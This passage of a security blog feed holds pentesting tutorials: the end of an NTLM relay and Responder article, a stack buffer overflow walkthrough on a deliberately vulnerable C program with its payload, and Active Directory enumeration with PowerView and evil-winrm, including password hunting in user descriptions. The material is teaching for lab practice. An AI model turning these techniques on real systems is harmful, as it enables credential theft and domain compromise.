Once valid credentials are found, we can use the following command to validate whether the user exists or not. Likewise, if the response shows &quot;Pwn3d!&quot; it will mean that the user is an administrator on the machine.

![](/content/images/2023/04/image-6.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What attack can I use to obtain Net-NTLMv2 hashes?&lt;/summary&gt;

I can poison network resolution protocols such as LLMNR, NBT-NS or MDNS to force authentication attempts against my machine when it is looking for network resources that do not exist. To perform this attack, I can use the Responder tool.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What attack involving NTLM can I use to dump the SAM of a machine and what condition must be met for this to happen?&lt;/summary&gt;

We can use the NTLM Relay attack. To dump the SAM of the machine to which the connections are redirected, we have to capture incoming connections from an administrator user on that machine.
&lt;/details&gt;

# References

[NTLM Relay](https://en.hackndo.com/ntlm-relay/)

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[A Detailed Guide on Responder (LLMNR Poisoning) - Hacking Articles](https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring Buffer Overflow Exploits: A Practical Guide with Dynamic Analysis</title><link>https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack</guid><description>We explore vulnerable code, disabling defenses and utilizing radare2 for dynamic analysis. Focusing on &apos;strcpy&apos; and &apos;Smash the Stack&apos; attack, we manipulate a buffer to alter &apos;modified&apos;. The article covers buffer overflow, debugging, and the significance of testing various payloads</description><pubDate>Fri, 14 Apr 2023 10:15:04 GMT</pubDate><content:encoded># **Unlocking the Secrets of Vulnerable Code: A Journey into Exploit Development**

Welcome to an exhilarating foray into the world of exploit development, where we transform theory into action. In this guide, we&apos;re not just learning about exploits; we&apos;re actively creating one. Our task is to manipulate a seemingly innocuous variable named &quot;modified&quot; and turn it into the key that unlocks a hidden message. This adventure also serves as your introduction to the art of dynamic code analysis, an indispensable skill in the exploit writer&apos;s toolkit. So, gear up for an exciting journey through the labyrinth of vulnerable code, where each line holds a clue, and every command unravels part of the mystery.

# **From Introduction to Exploration: Diving Into the Code**

As we transition from our introduction to the practical aspects, let&apos;s start our hands-on journey. Our mission is simple yet intriguing: manipulate the value of the variable &quot;modified&quot; to unlock a specific message. Ready to dive in? Here&apos;s the code that will be our playground:

```c
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, &quot;please specify an argument\n&quot;);
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf(&quot;you have correctly got the variable to the right value\n&quot;);
  } else {
      printf(&quot;Try again, you got 0x%08x\n&quot;, modified);
  }
}

```

# **Bridging Exploration and Compilation: Understanding Our Code&apos;s Foundation**

Now that we&apos;ve explored the vulnerable code, let&apos;s delve deeper into its structure and see how it behaves when compiled. We&apos;ll disable certain operating system defenses to delve deeper into how our code behaves during execution.

```bash
[rsgbengi@kaysel]: gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack1 stack1.c

[rsgbengi@kaysel]: ./stack1 subscribe
Try again, you got 0x00000000

```

As seen from this initial run, a &quot;normal&quot; execution doesn&apos;t modify the &quot;modified&quot; variable as intended, leaving us with the unfulfilled condition.

## Understanding the Stack Status

**The Execution State**: To grasp this technique fully, we need to understand the program&apos;s execution state once it enters the main function. A diagram of this state can be incredibly helpful.

![](/content/images/2023/04/pila.png)

Stack status before execution

**Function Prologue and Stack Layout**: As we observed in a previous chapter, the function&apos;s prologue (executed by the `entry0` function in radare2) places the old EBP and the return address on the stack. Inside the main function, the values of &quot;modified&quot; and &quot;buffer&quot; are also stacked, following the order they are defined in the source code. First, we have &apos;modified&apos;, and then &apos;buffer&apos;, reflecting their declaration order:

```c
int main(int argc, char **argv)
{
  volatile int modified; //First Modified
  char buffer[64]; //Second buffer
  ...

```

# **Linking Compilation to Analysis: Uncovering the Code&apos;s Inner Workings**

With our code compiled and its execution state understood, we move to a more detailed analysis with radare2. Let’s break down the process of parsing and analyzing the binary to reveal the secrets hidden in its code.

## Parsing the Binary with radare2

-   **Initializing Analysis**: Start by analyzing the binary with the `aaa` command. This sets the stage for a thorough examination.
-   **Listing Functions**: Next, use `afl` to list all the available functions. Here, our prime focus will be the main function – the heart of our vulnerable code.

![](/content/images/2023/04/functions.png)

Sample functions of the binary

## Dissecting the Main Function

-   **Code Disassembly**: To disassemble and inspect the main function, the `pdf` command is your tool of choice. It lays bare the function&apos;s code, making it accessible for analysis.
-   **Understanding the Prologue**: The function&apos;s prologue is our first point of interest. Here, you&apos;ll notice the creation of a 0x44-byte (68-byte) space in the stack. This space is divided between the 0x40-byte (64-byte) buffer and the 4-byte variable &quot;var\_4h&quot;.
-   **Type Transformations with rax2**: radare2&apos;s `rax2` tool is handy for conversions. For instance, to understand what 64 characters translate to in bytes:

```bash
[rsgbengi@kaysel]$ rax2 64
0x40

```

## Analyzing Key Code Segments

-   **Argument Check**: The second key segment involves checking if an argument is provided. Absence of an argument triggers an error message.
-   **Buffer Manipulation**: The third critical part sets up registers to copy user-provided content into the buffer using `strcpy`.
-   **Variable Comparison**: Next, the code compares &quot;var\_4h&quot; (&quot;modified&quot; in C) with `0x61626364`. Matching this value triggers a success message; else, an error is displayed.
-   **Function Epilogue**: The final point of analysis is the function&apos;s epilogue.

![](/content/images/2023/04/codigoVulnerable.png)

Disassembled code Sample

## Visualizing Code Flow

**Enhanced Visualization**: To better understand the code&apos;s flow, especially the jumps caused by if/else conditions, use the `VV` command in radare2. This provides a visual representation, making it easier to follow the code’s logic.

![](/content/images/2023/04/mapa.png)

Sample code graph

# **Connecting Analysis to Vulnerability Exploration: Identifying Weaknesses**

Having analyzed the code in detail, let’s identify the vulnerabilities that we can exploit, starting with the risks associated with &apos;strcpy&apos;. It&apos;s here that our code&apos;s defenses begin to crumble, laying bare a path for us to explore and exploit its frailties. Let&apos;s delve into this vulnerability and uncover how it becomes a gateway for potential attacks.

## **The Perils of &apos;strcpy&apos;: A Closer Look**

**Spotting the Flaw:** A glance at the `strcpy` manual reveals a glaring oversight. Picture this: `strcpy` diligently copies characters into a buffer, blissfully unaware if there&apos;s enough room. It&apos;s akin to trying to fit a gallon of water into a pint glass – a messy overflow is a foregone conclusion.

**A Hacker&apos;s Preferred Tool:** For those in the hacking trade, exploiting fixed-length string buffers is like striking gold. The simplicity of `strcpy`, with its blatant disregard for checking available space, makes it an ideal target for buffer overflow escapades.

**Beware of Complacency:** It&apos;s a risky business to assume that an overflow is off the table. Code is like a living entity, evolving and adapting. Today&apos;s impossibilities might become tomorrow&apos;s vulnerabilities.

## **Buffer Overflow Attack: Leaving the Door Ajar**

**Exploiting the Gap:** Our code, in its current form, fails to measure the incoming characters against the buffer&apos;s capacity, essentially rolling out the red carpet for a buffer overflow attack. It’s like inadvertently leaving the key in the lock, an open invitation for attackers to waltz in and seize control.

# **From Vulnerability to Exploitation: Setting the Stage for the Attack**

Understanding the risks of &apos;strcpy&apos; sets us up for the next phase, where we manipulate a data buffer in the stack. Here, we manipulate a data buffer in the stack, pushing it beyond its limits. The central exploit? A flaw in the `strcpy` function that lets us sneak in more data than the buffer is meant to handle. It&apos;s a bit like overstuffing a suitcase until the seams give way.

Our mission? To alter the &quot;modified&quot; variable, the unsuspecting hero of our story, by breaching the buffer&apos;s boundaries.

While buffer overflows often aim to manipulate the return address, that&apos;s a tale for another time. Today, we focus on the fundamental strategies of this digital heist.

![](/content/images/2023/04/desbordamiento.png)

Buffer Overflow diagram

## **Laying the Groundwork for the Attack: A Precise Approach**

After grasping the concept of buffer overflow, our next step is to prepare the attack by feeding the program exactly 64 bytes. It&apos;s like setting the chessboard before the masterstroke. The subsequent 4 bytes we enter are like secret codes, clandestinely tweaking the &quot;modified&quot; variable. This phase is akin to gaining VIP access to the hidden mechanisms of the program.

Here&apos;s a key fact: each character counts as one byte. So we start with 64 &quot;A&quot; characters to fill the buffer, followed by the byte sequence &quot;0x64/0x63/0x62/0x61&quot; – which, read as a little-endian integer, is exactly 0x61626364, our recipe for success. To decipher these enigmatic characters, we consult our digital oracle, `rax2`:

```bash
[rsbengi@kaysel]$ rax2 -s 64636261
dcba

```
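
The byte order is doing the heavy lifting here: x86 is little-endian, so the integer 0x61626364 lives in memory as the bytes 0x64 0x63 0x62 0x61 – the string &quot;dcba&quot;. A quick Python sanity check of the full payload:

```python
# x86 is little-endian: the integer 0x61626364 is stored as bytes 0x64 0x63 0x62 0x61
tail = (0x61626364).to_bytes(4, "little")
assert tail == b"dcba"

payload = b"A" * 64 + tail  # 64 bytes of padding, then the value for "modified"
print(payload.decode())     # the exact argument passed to ./stack1
```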

Now, it&apos;s time to wield our programming wand with Python, conjuring up the perfect payload:

```bash
[rsgbengi@kaysel]$ python3 -c &quot;print(&apos;A&apos;*64+&apos;dcba&apos;)&quot; 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

```

## **Revealing the Exploit: Bringing Our Plan to Fruition**

With the groundwork laid, it&apos;s time to see our plan in action and witness the fruits of our labor. And, like magic, the program succumbs to our cunning. The moment of triumph is illustrated in the image below – a testament to a well-executed exploit.

![](/content/images/2023/04/Pasted-image-20230319175808.png)

Successful program execution

# **Reflecting on Our Journey: Debugging and Analysis**

As we celebrate our successful exploit, it&apos;s crucial to reflect on the process and understand what went behind the scenes. This is where a little knowledge of reverse engineering and dynamic analysis comes in handy. Think of it as the behind-the-scenes work that makes the magic happen.

We use `radare2` with a special `-d` flag for this part, like a director calling action on a movie set:

```bash
[rsgbengi@kaysel]$ r2 -d stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

```

## **Zooming in on the Main Function**

Our main area of interest is, quite literally, the main function. To get there, we need to play a bit of a navigation game. It starts with finding the memory address of the main function&apos;s first instruction. We use the &quot;pd&quot; command for this – think of it as our digital compass. After pinpointing the location, we set a breakpoint using the &quot;db&quot; command. It&apos;s like bookmarking a crucial page in a mystery novel.

Next, we use the &quot;dc&quot; command to proceed to this breakpoint. It&apos;s a bit like fast-forwarding a movie to the good part.

![](/content/images/2023/04/dynamic.png)

Advance the code to the main function

## **Navigating the Program with Precision**

Once we&apos;re in the heart of the main function, our journey continues one step at a time, using the &quot;ds&quot; command. For those who prefer a more visual approach, we switch to a Terminal User Interface (TUI) environment with the &quot;v&quot; command. Here, each instruction unfolds like a scene in a play, providing a clear view of the stack and register status.

In the image below, you&apos;ll notice an abundance of &quot;0x41&quot;, a digital signature of our &quot;A&quot; characters. It&apos;s like finding breadcrumbs that lead back to our initial steps.

![](/content/images/2023/04/Pasted-image-20230321204419.png)

Sample radare2 user interface

## **Unraveling the Variables&apos; Tale**

Diving further, we see how our payload has subtly altered the narrative. The variable &quot;var\_4h&quot;, representing &quot;modified&quot;, now holds the value we introduced (dcba). It’s like watching a character in a story evolve based on the decisions we made earlier. Meanwhile, &quot;var\_44h&quot;, akin to our buffer in the source code, marks the starting point of our buffer journey.

![](/content/images/2023/04/Pasted-image-20230321203921.png)

Sample variables and their corresponding values in the code

## **Decoding the Exploit&apos;s Success**

This analytical journey helps us unravel the mystery behind why our exploit works. While in this instance we hit the jackpot on our first try, it&apos;s usually not this straightforward. Learning to conduct test cases with various payloads is akin to a chef tweaking a recipe to perfection. It’s an essential skill for making an exploit work, much like finding the right ingredients for a gourmet dish.  

# **Mastering the Art of Exploitation: Insights and Next Steps**

As we reach the end of this journey, it&apos;s clear that the world of code exploitation is both complex and fascinating. Through our hands-on exploration with radare2, we&apos;ve not only unlocked the secrets of a vulnerable piece of code but also gained valuable insights into the methodologies and thought processes behind successful exploits.

## **Key Takeaways**

1.  **Buffer Overflow Basics:** We&apos;ve seen how buffer overflows can be exploited to manipulate data and control program flow, a fundamental concept in the world of hacking.
2.  **Dynamic Analysis Mastery:** The use of radare2 has empowered us to dissect and understand code at a deeper level, showcasing the power of dynamic analysis in exploit development.
3.  **Strategic Exploitation:** Our exploration has highlighted the importance of strategic thinking, from padding and debugging to payload insertion, in creating successful exploits.

## **Looking Ahead**

As you continue your journey in exploit development, remember that each piece of code offers a new challenge and an opportunity to refine your skills. The techniques and insights gleaned here are just the beginning. With practice and perseverance, you can transform these foundational skills into a potent toolset for uncovering and exploiting vulnerabilities in software.

## **Final Thought**

The path of an exploit developer is one of constant learning and adaptation. Stay curious, keep experimenting, and never stop exploring the depths of code. Who knows what secrets you&apos;ll unlock next?

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is a buffer overflow? What is usually used for?&lt;/summary&gt;

It is a vulnerability that consists of overflowing a buffer to modify data outside the memory occupied by that particular buffer.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you give me an example of buffer overflow utility ?&lt;/summary&gt;

It is commonly used to change the value of the return address in such a way as to modify the program execution flow. However, it can also be used, for example, to change the value of variables used by the program, thus causing anomalous behavior.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What methodology can we use to exploit a buffer overflow?&lt;/summary&gt;

-   First, we introduce a padding to see when the program crashes.
-   Next, we use a debugger to analyze where the target to modify is located and how much padding we have to add to modify it.
-   Finally we incorporate at the end of the padding the payload that we want to introduce in the vulnerable code.
&lt;/details&gt;

# References

[radare2/doc/intro.md at master · radareorg/radare2](https://github.com/radareorg/radare2/blob/master/doc/intro.md)

[Ataque “Smash the stack” · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/1-practica.html)</content:encoded><author>Ruben Santos</author></item><item><title>User-Centric Pentesting: Unveiling Secrets with PowerView and PowerSploit</title><link>https://www.kayssel.com/post/active-directory-5</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-5</guid><description>Explore Active Directory in-depth: Learn to identify key user accounts, decrypt secrets with NT/LM hashes and Kerberos keys, understand computer accounts, and strategically manage user groups for effective penetration testing.</description><pubDate>Fri, 31 Mar 2023 15:39:53 GMT</pubDate><content:encoded># **Introduction: Delving Deeper into Active Directory for Penetration Testing**

Welcome to another insightful chapter in our ongoing series focused on mastering penetration testing within Active Directory environments. As we delve deeper into this complex and critical aspect of network security, this chapter is designed to expand your understanding and skills in navigating Active Directory&apos;s multifaceted landscape.

In this installment, we turn our attention to the intricate details that often make the difference between a surface-level understanding and a profound mastery of penetration testing. We will explore the nuances of user properties and secrets, understand the pivotal role of computer accounts, and dissect the strategic importance of groups within Active Directory.

Our journey will not only guide you through the process of identifying and analyzing key user accounts and their encrypted secrets but will also delve into the significant role of groups in privilege management. This chapter aims to provide you with the knowledge and tools necessary to navigate and exploit these systems more effectively, enhancing your capabilities as a cybersecurity professional.

Join me as we continue to unravel the complexities of Active Directory, paving the way for more advanced techniques and strategies in our series. Whether you&apos;re a seasoned expert or just starting in the field, this chapter is set to enrich your understanding and approach to penetration testing in these ubiquitous and vital network environments.

```bash
evil-winrm -i 192.168.253.130 -u vaan -p &apos;Password1&apos; -s powershellscripts/

```

![](/content/images/2023/03/installPowerview.png)

Command execution via evil-winrm

Join me as we dive into this exciting phase, where understanding the user landscape becomes key to mastering penetration testing in Active Directory environments.

# **Exploring User Properties in Active Directory for Penetration Testing**

In the fascinating world of Active Directory penetration testing, knowing your way around user properties is like having a master key. With PowerView, part of the versatile PowerSploit framework, we unlock a treasure trove of information about users in the domain. Let&apos;s dive into how this powerful tool can be your ally in uncovering critical user details.

## Getting to Know Users with PowerView

-   **The Initial Command**: The journey begins with `Get-NetUser`. This simple yet potent command opens the door to an array of user properties, including the elusive Security Identifier (SID). Remember, the SID is a unique identifier, part domain, part user, and understanding it is like learning a secret language of Windows programs.
-   **The Importance of &apos;Distinguished Name&apos;**: The &quot;distinguishedname&quot; property is our map to the domain&apos;s NTDS, guiding us through the maze of user queries.
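
The SID format is mechanical enough to split by hand: everything up to the last hyphen identifies the domain, and the final component is the user&apos;s RID. A tiny Python sketch (the domain SID below is hypothetical; 500 is the well-known RID of the built-in Administrator):

```python
def split_sid(sid: str):
    # Everything before the last hyphen is the domain SID; the tail is the RID
    domain_sid, rid = sid.rsplit("-", 1)
    return domain_sid, int(rid)

# Hypothetical domain SID; RID 500 is the well-known built-in Administrator
domain_sid, rid = split_sid("S-1-5-21-1004336348-1177238915-682003330-500")
print(domain_sid, rid)
```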

![](/content/images/2023/03/userProperties.png)

Getting users through powerview

## Focusing Your Search

-   **Zooming In on Users**: Need details about a specific user? Just ask PowerView: `Get-NetUser -Username &lt;user&gt;`.
-   **The User Roster**: For a bird&apos;s-eye view of all domain users, simply run `Get-NetUser | select cn`. It&apos;s like having the entire domain&apos;s roll call at your fingertips.

## Advanced User Reconnaissance

-   **Property-Based Filtering**: Dive deeper with filters like `Get-NetUser -Properties pwdlastset` to get insights into password settings.
-   **Unearthing Hidden Treasures in Descriptions**: Often, user descriptions are gold mines, sometimes hiding passwords in plain sight. A command like `Get-NetUser -Properties description` can lead you to unexpected discoveries.

### Streamlining Searches in Vast Domains

**Hunting for Password Clues**: In larger domains, where user lists are as vast as the ocean, use a more targeted approach to fish for potential passwords hidden in descriptions:

```powershell
# Get-NetUser -Properties description 
*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetUser -Properties description 

description
-----------
Built-in account for administering the computer/domain
Built-in account for guest access to the computer/domain
Key Distribution Center Service Account
The password is Password1

My password is Password3

```

```powershell
*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetUser -Properties description,cn | select-string &quot;Pass&quot;

@{cn=Beru Insect; description=The password is Password1}
@{cn=SQL Service; description=My password is Password3}

```

## Bringing It to Life in a Lab

-   **Practical Application**: To see these techniques in action, venture into a domain controller setup under Tools → Active Directory Users and Computers. It’s like setting up your own playground to experiment and see firsthand how these commands perform in a controlled environment.

![](/content/images/2023/03/Pasted-image-20230305110109.png)

Description of a user

## **User Secrets: Deciphering the Storage Formats in Windows**

In our journey through Active Directory penetration testing, understanding how user secrets are stored on Windows machines is a game-changer. Let&apos;s dive deeper into the formats used for storing these secrets, shifting our focus from retrieval techniques to the actual structure and encryption of these credentials.

### The Encryption Landscape: NT/LM Hashes and Kerberos Keys

-   **Beyond Plain Text**: First off, it&apos;s crucial to know that Windows doesn&apos;t store user passwords in plain text. Instead, it encrypts them, primarily using &quot;NT/LM hashes&quot; and &quot;Kerberos keys.&quot;
-   **NT/LM Hashes Unveiled**:
    -   **Location**: These hashes are found in the SAM (Security Accounts Manager) for local user credentials, and in the NTDS (NT Directory Services) for domain user credentials.
    -   **NT Hash**: This is the modern standard. It&apos;s the encrypted form of the user password predominantly in use.
    -   **LM Hash**: An older, less secure format, not actively used since Windows Vista/Server 2008 due to its vulnerability to cracking. However, its presence persists in SAM and NTDS for backward compatibility with older Windows applications.
    -   **Hash Example**:

```bash
&lt;username&gt;:&lt;rid&gt;:&lt;LM&gt;:&lt;NT&gt;::: 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
LM: aad3b435b51404eeaad3b435b51404ee # Always the same value nowadays
NT: 31d6cfe0d16ae931b73c59d7e0c089c0 # The NT hash actually in use

```
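
Tooling like secretsdump prints these colon-separated lines, and they are trivial to parse. A small, hypothetical Python helper that also flags the tell-tale LM hash of an empty password:

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password

def parse_secret_line(line: str) -> dict:
    # Layout: username:rid:LM:NT:::
    user, rid, lm, nt = line.split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_disabled": lm.lower() == EMPTY_LM}

entry = parse_secret_line(
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
    "31d6cfe0d16ae931b73c59d7e0c089c0:::"
)
print(entry["user"], entry["rid"], entry["nt"])
```

Seeing the empty-password LM value everywhere simply confirms that LM hashing is disabled on the target, as expected on anything newer than Vista/Server 2008.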

-   **Kerberos Keys**:
    -   **Function**: These are derived from user passwords and are vital for authentication via the Kerberos protocol.
    -   **Encryption Algorithms**:
        -   **AES 256 Key**: The go-to for the AES256-CTS-HMAC-SHA1-96 algorithm, commonly used by Kerberos.
        -   **AES 128 Key**: Used with the AES128-CTS-HMAC-SHA1-96 algorithm.
        -   **DES Key**: Linked to the now-deprecated DES-CBC-MD5 algorithm.
        -   **RC4 Key**: Essentially the NT hash, employed by the RC4 HMAC algorithm.

## Retrieving and Decrypting Credentials

-   **Techniques from Previous Chapters**: To extract these credentials, we employ the methods discussed in earlier chapters of this series.
-   **Administrator Privileges**: A key point to remember is that recovering these passwords requires administrator-level access.

## UserAccountControl

UserAccountControl is a property of every account that deserves attention from a security point of view: it is a bitmask, and its most relevant flags are the following:

-   **ACCOUNT\_DISABLE**: Account is disabled and cannot be used.
-   **DONT\_REQUIRE\_PREAUTH**: The account doesn&apos;t require Kerberos pre-authentication.
-   **NOT\_DELEGATED**: This account cannot be delegated through Kerberos delegation.
-   **TRUSTED\_FOR\_DELEGATION**: Kerberos Unconstrained Delegation is enabled for this account and its services.
-   **TRUSTED\_TO\_AUTH\_FOR\_DELEGATION**: The Kerberos S4USelf extension is enabled for this account and its services.
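Since UserAccountControl is a bitmask, the flags above can be decoded from the raw integer. A minimal Python sketch using the documented bit values (e.g. DONT\_REQUIRE\_PREAUTH = 0x400000):

```python
# Documented userAccountControl bit values (Microsoft AD schema).
UAC_FLAGS = {
    0x0002:    "ACCOUNT_DISABLE",
    0x80000:   "TRUSTED_FOR_DELEGATION",
    0x100000:  "NOT_DELEGATED",
    0x400000:  "DONT_REQUIRE_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

def decode_uac(value: int) -> list:
    """Return the names of the flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

# 0x400200 = NORMAL_ACCOUNT (0x200) | DONT_REQUIRE_PREAUTH (0x400000):
# an enabled user that does not require Kerberos pre-authentication.
print(decode_uac(0x400200))  # ['DONT_REQUIRE_PREAUTH']
```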

# **Zeroing in on Key Users for Effective Active Directory Penetration Testing**

When you&apos;re navigating the intricate maze of a real-world domain, the sheer number of users can be overwhelming. It&apos;s like looking for a needle in a haystack. To help you zero in on the most impactful targets, here are some essential pointers to identify the key players in any domain.

## Identifying the Power Players

-   **Spot the IT Gurus**: Keep a sharp eye for users associated with IT. These folks often have the coveted administrative privileges – your golden ticket to broader access and control within the system.
-   **Target the Domain Overlord**: The default domain administrator user is your ultimate target. Imagine having a master key to every door in the domain; that&apos;s what compromising this account feels like.
-   **Don&apos;t Overlook krbtgt**: The krbtgt user account is like the silent guardian of user authentication, wielding the powerful NT and Kerberos keys. Understanding its role is crucial, especially as we delve deeper into Active Directory services in upcoming chapters.

## Cutting Through the Clutter with PowerView

-   **Finding the Admins with Ease**: To get straight to the admins, let PowerView be your guide. The `Invoke-EnumerateLocalAdmin` command is your searchlight, illuminating those with administrative powers amidst the sea of users.

![](/content/images/2023/03/enumAdmins.png)

Existing administrators in the machine

# **Unveiling Computer Accounts in Active Directory**

In the dynamic world of Active Directory, not only users but also computers have their unique accounts. These accounts are pivotal, as they play a crucial role in verifying the credentials of domain users attempting to log in. Identifying these computer accounts is quite straightforward – their name is the computer&apos;s hostname followed by a dollar sign.

### Exploring Computer Accounts

-   **Querying the NTDS**: Want to take a peek at the different computers in the domain? It&apos;s simple. By querying the domain database (NTDS), you can reveal the myriad of computer accounts that exist. Just use this command:

```powershell

Get-ADObject -LDAPFilter &quot;objectClass=User&quot; -Properties SamAccountName | select SamAccountName

```

![](/content/images/2023/03/computerAccounts.png)

Sample of domain users where those ending with &quot;$&quot; refer to computers.
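The dollar-sign convention makes it trivial to separate machine accounts from human users in any account listing; a quick Python sketch with made-up account names:

```python
# Split a SamAccountName listing into users and computer accounts:
# machine account names always end with "$".
accounts = ["Administrator", "Guest", "krbtgt", "vaan", "DC01$", "WS01$"]

computers = [a for a in accounts if a.endswith("$")]
users = [a for a in accounts if not a.endswith("$")]

print(computers)  # ['DC01$', 'WS01$']
```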

**PowerView to the Rescue**: For a more targeted approach, especially if you&apos;re a fan of PowerView, you can enumerate the computers in the domain with ease. The following command not only does the job but also returns the names of the machines, making your search even more efficient:

```powershell
Get-NetComputer

```

# **Mastering Groups in Active Directory Penetration Testing**

In the intricate ecosystem of Active Directory, &apos;Groups&apos; is a powerful feature by Microsoft that simplifies the management of user privileges. Whether it&apos;s granting or revoking access rights, groups allow administrators to perform these tasks efficiently, impacting multiple users simultaneously. Let&apos;s explore how we can leverage this feature for effective penetration testing.

### Harnessing the Power of Groups

-   **Discovering Domain Groups**: To get a list of all the groups in the domain, the command is straightforward:

```powershell

Get-ADGroup -Filter * | select SamAccountName

```

![](/content/images/2023/03/Groups.png)

Existing groups in the domain

**Using PowerView for Group Enumeration**: PowerView offers an intuitive way to list the different groups in the domain:

```powershell
Get-NetGroup

```

**Focusing on Privileged Groups**: To narrow down your search to groups with &apos;admin&apos; in their names, which are often privileged, use:

```powershell

Get-NetGroup *admin*

```

**Identifying a User’s Groups**: To find out the groups a specific user belongs to:

```powershell
#Get-NetGroup -UserName &lt;user&gt;
*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetGroup -UserName vaan -Properties samaccountname

samaccountname
--------------
Denied RODC Password Replication Group
Domain Users
Domain Admins

```

**Listing Users in a Specific Group**: And to list all users within a particular group, such as &apos;Domain Admins&apos;:

```powershell

Get-DomainGroupMember -Identity &quot;Domain Admins&quot; -Recurse

```

![](/content/images/2023/03/usersOfAGroup-1.png)

Sample of users belonging to the group &quot;Domain Admins&quot;
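The `-Recurse` flag matters because group membership nests. A Python sketch of the idea, with invented group names, expanding nested groups down to user accounts while guarding against membership cycles:

```python
# Sketch of what -Recurse does: expand nested group membership until
# only user accounts remain. Group names/memberships here are made up.
MEMBERS = {  # group -> direct members (users or other groups)
    "Domain Admins": ["vaan", "Tier0 Admins"],
    "Tier0 Admins": ["ashe", "Domain Admins"],  # note the cycle
}

def expand(group, seen):
    users = set()
    for m in MEMBERS.get(group, []):
        if m in MEMBERS:          # member is itself a group
            if m not in seen:     # guard against membership cycles
                seen.add(m)
                users |= expand(m, seen)
        else:
            users.add(m)
    return users

print(sorted(expand("Domain Admins", {"Domain Admins"})))  # ['ashe', 'vaan']
```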

## Important Groups to Note

**Domain Admins, Local Administrators, and Administrators**: These groups are particularly significant. Members of the &apos;Domain Admins&apos; group, who are automatically part of the &apos;Administrators&apos; group, have broad privileges across the domain. Compromising any user in this group could mean a total domain takeover. Similarly, the &apos;Local Administrators&apos; group is key for gaining maximum privileges on a specific machine. This is due to Domain Admins being added to local machine administrator groups by default.

![](/content/images/2023/03/Pasted-image-20230307125119.png)

Users and groups that are members of a computer&apos;s local Administrators group

![](/content/images/2023/03/ImportantGroups.png)

Groups with high privileges

# **Conclusion: Navigating the Complex Web of Active Directory in Penetration Testing**

As we wrap up this chapter, we&apos;ve traversed the intricate landscape of Active Directory, a cornerstone in the realm of network security and penetration testing. From the nuances of user properties and secrets to the strategic management of groups, our journey has equipped us with key insights and tools to navigate and exploit these systems effectively.

We&apos;ve learned how to identify and analyze crucial user accounts, decrypting the secrets behind NT/LM hashes and Kerberos keys. We&apos;ve also explored the significance of computer accounts, revealing their integral role in network security. Our deep dive into groups - the backbone of privilege management in Active Directory - has highlighted the importance of targeting specific user groups for a more efficient penetration testing strategy.

Understanding these elements of Active Directory is vital for anyone in the field of cybersecurity. It empowers us not only to identify vulnerabilities and potential attack vectors but also to think strategically about network security as a whole. As we continue this series, we will build upon this foundation, uncovering more advanced techniques and insights to enhance our skills in penetration testing and cybersecurity.

In the ever-evolving landscape of digital security, knowledge is power. And the insights gained in this chapter are invaluable tools in the arsenal of any cybersecurity professional, offering a guiding light through the complex, often daunting world of Active Directory penetration testing.

# Resources

[Active Directory Enumeration: PowerView - Hacking Articles](https://www.hackingarticles.in/active-directory-enumeration-powerview/)

[https://thehackerway.com/2021/12/15/evil-winrm-shell-sobre-winrm-para-pentesting-en-sistemas-windows-parte-2-de-2/](https://thehackerway.com/2021/12/15/evil-winrm-shell-sobre-winrm-para-pentesting-en-sistemas-windows-parte-2-de-2/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring ELF Binary Dynamics: Relocations and Sections in Depth</title><link>https://www.kayssel.com/post/binary-4</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-4</guid><description>Explore ELF binaries in Linux: Understand disassembly, sections like .text, .init, and dynamic linking with PLT, GOT. Uncover memory management, variables in .bss, .data, .rodata, and delve into lazy binding for efficient, secure code execution</description><pubDate>Sat, 18 Mar 2023 15:57:26 GMT</pubDate><content:encoded># **Introduction: My Journey Through ELF Binaries in the Linux Binary Exploitation Series**

Welcome to another chapter in my ongoing series on Linux binary exploitation, where I delve into the intricate world of Executable and Linkable Format (ELF) binaries. As I continue to explore the various aspects of binary exploitation on Linux, this installment is particularly special to me. It&apos;s here that I unravel the complexities and nuances of ELF binaries, a cornerstone of Linux and Unix systems.

In my journey through the realms of software development and cybersecurity, I&apos;ve encountered ELF binaries as more than just files; they are the essential gears that drive software’s interaction with the Linux operating system. This chapter builds on what I&apos;ve covered in previous parts of the series, taking a deep dive into the heart of ELF binaries. From the basic principles of disassembly and decompilation to the advanced realms of dynamic linking and vulnerability analysis, my aim is to demystify each element, offering a clear and comprehensive understanding.

